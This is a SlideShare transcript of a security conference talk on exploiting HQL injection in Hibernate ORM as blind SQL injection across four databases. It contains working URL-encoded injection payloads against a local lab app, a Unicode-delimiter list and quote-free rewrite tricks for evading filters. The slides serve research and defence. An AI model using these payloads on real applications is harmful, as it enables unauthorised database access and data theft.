SlideShare a Scribd company logo

ORM2Pwn: Exploiting injections in Hibernate ORM

Mikhail Egorov
Mikhail Egorov

Presented on Zeronights 0x05 security confernce.

Software
1 of 28
Download to read offline
ORM2Pwn: Exploiting injections in Hibernate ORM Mikhail Egorov Sergey Soldatov
Short BIO - Mikhail Egorov ▶ Application Security Engineer at Odin [ http://www.odin.com ] ▶ Security researcher and bug hunter ▶ Graduated from BMSTU with MSc. in Information Security [IU8] ▶ Holds OSCP and CISSP certificates ▶ See my blog [ http://0ang3el.blogspot.com ]
Short BIO - Sergey Soldatov ▶ Chief infosecurity manager at big corp.’s IT insourcer • GRC  and “paper security” • Security engineer and systems architect • Security operations manager and analyst ▶ Amateur hacker security researcher & musician ▶ BMSTU’s IU8 ▶ CISA, CISSP ▶ http://reply-to-all.blogspot.ru/
Motivation ▶ Modern applications work with DBMS not directly but via ORM ▶ In Java, Hibernate is a popular ORM [ Red Hat project ] ▶ Hibernate uses HQL, which is very limited [ versus SQL ] ▶ HQLi exploitation is limited 
Motivation ▶ Is it possible to exploit HQLi as SQLi for popular DBMSs? ▶ MySQL, Postgresql, Oracle, MS SQL Server are popular [ in our opinion  ] Picture from http://blog.h3xstream.com/2014/02/hql-for-pentesters.html
Chuck Norris can exploit SQLi even on static HTML pages
MySQL DBMS ▶ Hibernate escapes [‘] in string with [‘’] ▶ MySQL escapes [‘] in string with [’] ▶ Kudos to @_unread_ who disclosed this technique before our talk  • http://www.synacktiv.fr/ressources/hql2sql_sstic_2015_en.pdf
MySQL DBMS  What about string ‘abc’’or 1=(select 1)--’?  Hibernate – ‘abc’’or 1=(select 1)--’ [thinks it’s a string]  MySQL – ‘abc’’or 1=(select 1)--’
MySQL DBMS  Navigate to URL http://127.0.0.1:8080/app/dummy%27%27%20or%201<length((select%20vers ion()))%20--%20  HQL query - SELECT p FROM pl.btbw.persistent.Post p where p.name=‘dummy’’ or 1<length((select version())) -- ’  SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name=‘dummy’’ or 1<length((select version())) -- ’
Postgresql DBMS  Trick with ’’ not working • Quote escaping with ‘’ only [not with ’]  HQL allows subqueries in where clause  Hibernate allow arbitrary function names in HQL  Postgresql has nice built-in query_to_xml(‘SQL’)
Postgresql DBMS  query_to_xml(‘SQL’) return XML [not usable directly ]  Nevertheless it is possible to know if the SQL return 0 rows or > 0 array_upper(xpath('row',query_to_xml('select 1 where 1337>1', true, false,'')),1) array_upper(xpath('row',query_to_xml('select 1 where 1337<1', true, false,'')),1)
Postgresql DBMS SQL returns 1 row [ or more ] SQL returns no rows
Postgresql DBMS  Navigate to URL http://127.0.0.1:8080/hqli.playground/dummy%27%20and%20array_upper%28xpath%28%27row%27%2Cqu ery_to_xml%28%27select%201%20where%201337%3E1%27%2Ctrue%2Cfalse%2C%27%27%29%29%2C1%29%3D1%2 0and%20%271%27%3D%271  HQL query SELECT p FROM hqli.persistent.Post p where p.name='dummy' and array_upper(xpath('row',query_to_xml('select 1 where 1337>1',true,false,'')),1)=1 and '1'='1‘  SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' and array_upper(xpath('row', query_to_xml('select 1 where 1337>1', true, false, '')), 1)=1 and '1'='1'
Oracle DBMS  Trick with ’’ not working • Quote escaping with ‘’ [ not with ’ ]  Hibernate allow arbitrary function names in HQL  Oracle has nice built-in DBMS_XMLGEN.getxml(‘SQL’)
Oracle DBMS  DBMS_XMLGEN.getxml(‘SQL’) returns CLOB or null [ null if SQL returns no rows ]  It is possible to know if the SQL return 0 rows or > 0 using TO_CHAR and NVL built-ins NVL(TO_CHAR(DBMS_XMLGEN.getxml(‘SQL')),'1')!='1'
Oracle DBMS  Navigate to URL http://127.0.0.1:8080/app/dummy%27%20and%20NVL(TO_CHAR(DBMS_XMLGEN.getxml(%27SELECT%201337% 20FROM%20dual%20where%201337>1%27)),%271%27)!=%271%27%20and%20%271%27=%271  HQL query SELECT p FROM pl.btbw.persistent.Post p where p.name='dummy' and NVL(TO_CHAR(DBMS_XMLGEN.getxml('SELECT 1337 FROM dual where 1337>1')),'1')!='1' and '1'='1‘  SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' and NVL(to_char(DBMS_XMLGEN.getxml('SELECT 1337 FROM dual where 1337>1')), '1')<>'1' and '1'='1'
Microsoft SQL Server DBMS  Trick with ’’ not working • Quote escaping with ‘’ only [not with ’]  There are no usable functions like query_to_xml(‘SQL’)
Microsoft SQL Server DBMS  Hibernate ORM allows Unicode symbols in identifiers!!! ANTLR grammar for HQL parsing is here https://github.com/hibernate/hibernate-orm/blob/1ed895a3737c211e8c895b0297f801daccfe85a9/hibernate-core/src/main/antlr/hql.g ANTLR (ANother Tool for Language Recognition) - http://www.antlr.org/
Microsoft SQL Server DBMS  Hibernate ORM allows Unicode symbols in identifiers!!! IDENT options { testLiterals=true; } : ID_START_LETTER ( ID_LETTER )* { // Setting this flag allows the grammar to use keywords as identifiers, if necessary. setPossibleID(true); } ; protected ID_START_LETTER : '_' | '$' | 'a'..'z' | 'u0080'..'ufffe' // HHH-558 : Allow unicode chars in identifiers ; protected ID_LETTER : ID_START_LETTER | '0'..'9' ;
Microsoft SQL Server DBMS  MS SQL Server allows Unicode delimiters in query!!! There are many delimiters like space [U+0020] LEN(U(selectU(1)) [ U – Unicode delimiter ]  We’ve found them all with dumb Fuzzing!!!
Microsoft SQL Server DBMS  Here are the magic delimiters [U] U+00A0 %C2%A0 No-break space U+1680 %E1%9A%80 OGHAM SPACE MARK U+2000 %E2%80%80 EN QUAD U+2001 %E2%80%81 EM QUAD U+2002 %E2%80%82 EN SPACE U+2003 %E2%80%83 EM SPACE U+2004 %E2%80%84 THREE-PER-EM SPACE U+2005 %E2%80%85 FOUR-PER-EM SPACE U+2006 %E2%80%86 SIX-PER-EM SPACE U+2007 %E2%80%87 FIGURE SPACE U+2008 %E2%80%88 PUNCTUATION SPACE U+2009 %E2%80%89 Thin space
Microsoft SQL Server DBMS  Here are the magic delimiters [U] U+200A %E2%80%8A HAIR SPACE U+200B %E2%80%8B ZERO WIDTH SPACE U+2028 %E2%80%A8 LINE SEPARATOR U+2029 %E2%80%A9 PARAGRAPH SEPARATOR U+202F %E2%80%AF NARROW NO-BREAK SPACE U+205F %E2%81%9F Medium Mathematical space U+3000 %E3%80%80 Ideographic space
Microsoft SQL Server DBMS  Navigate to URL http://127.0.0.1:8080/app/dummy%27%20or%201%3CLEN%28%C2%A0%28select%C2%A0top%C2%A01%C2%A0una me%C2%A0from%C2%A0postusers%29%29%20or%20%2731%27=%27143999  HQL query SELECT p FROM pl.btbw.persistent.Post p where p.name='dummy' or 1<LEN([U+00A0]( select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999' Hibernate sees here two function calls: Len and [U+00A0] Identifier select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers is passed as function argument  Resulting SQL query select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' or 1<len([U+00A0](select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999'
Microsoft SQL Server DBMS select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' or 1<len([U+00A0](select[U+00A0]top[U+00A0]1[U+00A0]uname[U+00A0]from[U+00A0]postusers)) or '31'='143999‘ Is the same as select post0_.id as id1_0_, post0_.name as name2_0_ from post post0_ where post0_.name='dummy' or 1<len(select top 1 uname from postusers)) or '31'='143999'
Microsoft SQL Server DBMS: additional useful tricks Query fragment How to rewrite to full HQL Result where id=13 where id like 13 No “=“ where field=‘data’ where field like cast(0xDATA_IN_HEX as varchar) No “=“; No “ ’ “ where field not in (‘data1’, ‘data2’) where 0 like charindex(concat(‘+’,field,’+’), cast(0xDATA1DATA2_IN_HEX as varchar(MAX))) No list 0xDATA_IN_HEX smth_known_to_hibernate(..) U0xDATA_IN_HEX Usmth_known_to_hibernate(..) int || func  identifier substring((select…),N,1)=‘c’ N like charindex(‘c’, (select…), N) substring  charindex
Hey, dude stop it! Show me the hack! Video - https://www.youtube.com/watch?v=m_MTWZptXUw All demo scripts are here - https://github.com/0ang3el/Hibernate-Injection-Study Vulnerable App - https://github.com/0ang3el/HQLi-playground
Takeaways ▶ HQL injection is SQL injection [ exploit HQLi as bSQLi ] ▶ Hibernate is not a WAF ▶ Our exploitation technique works because: ▶ Hibernate allows arbitrary names for identifiers (function and argument names) ▶ Hibernate allows Unicode symbols in identifiers ▶ Hibernate escapes quotes [‘] in string by doubling them [‘’]
Questions?

Recommended

ORM Injection
ORM InjectionORM Injection
ORM InjectionSimone Onofri
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
New methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsNew methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsMikhail Egorov
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterMasato Kinugawa
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Hack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydHack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydn|u - The Open Security Community
 

Recommended

ORM Injection
ORM InjectionORM Injection
ORM InjectionSimone Onofri
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
New methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsNew methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsMikhail Egorov
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterMasato Kinugawa
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Hack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydHack like a pro with burp suite - nullhyd
Hack like a pro with burp suite - nullhydn|u - The Open Security Community
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingkinish kumar
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingn|u - The Open Security Community
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseNoaman Aziz
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassCODE WHITE GmbH
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
Applying profilers to my sql (fosdem 2017)
Applying profilers to my sql (fosdem 2017)Applying profilers to my sql (fosdem 2017)
Applying profilers to my sql (fosdem 2017)Valeriy Kravchuk
 

More Related Content

What's hot

Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingkinish kumar
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseNoaman Aziz
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassCODE WHITE GmbH
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 

What's hot (20)

Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackrose
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug Class
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 

Similar to ORM2Pwn: Exploiting injections in Hibernate ORM

Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
Applying profilers to my sql (fosdem 2017)
Applying profilers to my sql (fosdem 2017)Applying profilers to my sql (fosdem 2017)
Applying profilers to my sql (fosdem 2017)Valeriy Kravchuk
 
HandlerSocket plugin for MySQL (English)
HandlerSocket plugin for MySQL (English)HandlerSocket plugin for MySQL (English)
HandlerSocket plugin for MySQL (English)akirahiguchi
 
APEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQLAPEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQLConnor McDonald
 
PL/SQL User-Defined Functions in the Read World
PL/SQL User-Defined Functions in the Read WorldPL/SQL User-Defined Functions in the Read World
PL/SQL User-Defined Functions in the Read WorldMichael Rosenblum
 
A MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole CrossoverA MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole CrossoverKeith Hollman
 
Feb14 successful development
Feb14 successful developmentFeb14 successful development
Feb14 successful developmentConnor McDonald
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlChema Alonso
 
MoSQL: More than SQL, but less than ORM
MoSQL: More than SQL, but less than ORMMoSQL: More than SQL, but less than ORM
MoSQL: More than SQL, but less than ORMMosky Liu
 
Performance tuning a quick intoduction
Performance tuning a quick intoductionPerformance tuning a quick intoduction
Performance tuning a quick intoductionRiyaj Shamsudeen
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingChema Alonso
 
SQL Macros - Game Changing Feature for SQL Developers?
SQL Macros - Game Changing Feature for SQL Developers?SQL Macros - Game Changing Feature for SQL Developers?
SQL Macros - Game Changing Feature for SQL Developers?Andrej Pashchenko
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormguest785f78
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionChema Alonso
 

Similar to ORM2Pwn: Exploiting injections in Hibernate ORM (20)

Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
 
Applying profilers to my sql (fosdem 2017)
Applying profilers to my sql (fosdem 2017)Applying profilers to my sql (fosdem 2017)
Applying profilers to my sql (fosdem 2017)
 
HandlerSocket plugin for MySQL (English)
HandlerSocket plugin for MySQL (English)HandlerSocket plugin for MySQL (English)
HandlerSocket plugin for MySQL (English)
 
APEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQLAPEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQL
 
PL/SQL User-Defined Functions in the Read World
PL/SQL User-Defined Functions in the Read WorldPL/SQL User-Defined Functions in the Read World
PL/SQL User-Defined Functions in the Read World
 
A MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole CrossoverA MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole Crossover
 
Feb14 successful development
Feb14 successful developmentFeb14 successful development
Feb14 successful development
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
 
MoSQL: More than SQL, but less than ORM
MoSQL: More than SQL, but less than ORMMoSQL: More than SQL, but less than ORM
MoSQL: More than SQL, but less than ORM
 
Performance tuning a quick intoduction
Performance tuning a quick intoductionPerformance tuning a quick intoduction
Performance tuning a quick intoduction
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File Downloading
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL Macros - Game Changing Feature for SQL Developers?
SQL Macros - Game Changing Feature for SQL Developers?SQL Macros - Game Changing Feature for SQL Developers?
SQL Macros - Game Changing Feature for SQL Developers?
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
Awr doag
Awr doagAwr doag
Awr doag
 
Ash and awr deep dive hotsos
Ash and awr deep dive hotsosAsh and awr deep dive hotsos
Ash and awr deep dive hotsos
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
 
Beg sql
Beg sqlBeg sql
Beg sql
 
Beg sql
Beg sqlBeg sql
Beg sql
 

More from Mikhail Egorov

A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityMikhail Egorov
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...Mikhail Egorov
 
Unsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST APIUnsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST APIMikhail Egorov
 
Entity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applicationsEntity provider selection confusion attacks in JAX-RS applications
Entity provider selection confusion attacks in JAX-RS applicationsMikhail Egorov
 

More from Mikhail Egorov (6)

A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 
